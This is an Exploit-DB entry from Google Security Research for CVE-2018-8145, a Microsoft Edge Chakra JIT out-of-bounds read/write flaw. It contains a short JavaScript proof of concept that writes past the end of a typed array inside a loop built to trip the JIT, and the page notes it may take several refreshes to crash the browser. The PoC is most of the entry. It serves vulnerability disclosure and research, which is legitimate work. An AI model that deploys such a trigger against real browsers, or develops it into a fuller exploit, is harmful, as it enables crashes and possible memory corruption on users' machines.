Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes

EDB-ID: 45011
Author: Google Security Research
Published: 2018-07-12
CVE: CVE-2018-8145
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: Denial of Service (DoS), Out Of Bounds
Vulnerable App: N/A

 It seems that this issue is similar to the  issue 1429  (MSRC 42111). It might need to refresh the page several times to observe a crash. 

PoC:
*/

let arr = new Uint32Array(1000);
for (let i = 0; i < 0x1000000; i++) {
for (let j = 0; j < 1; j++) {
i--;
i++;
}

arr[i] = 0x1234;
}

Related Posts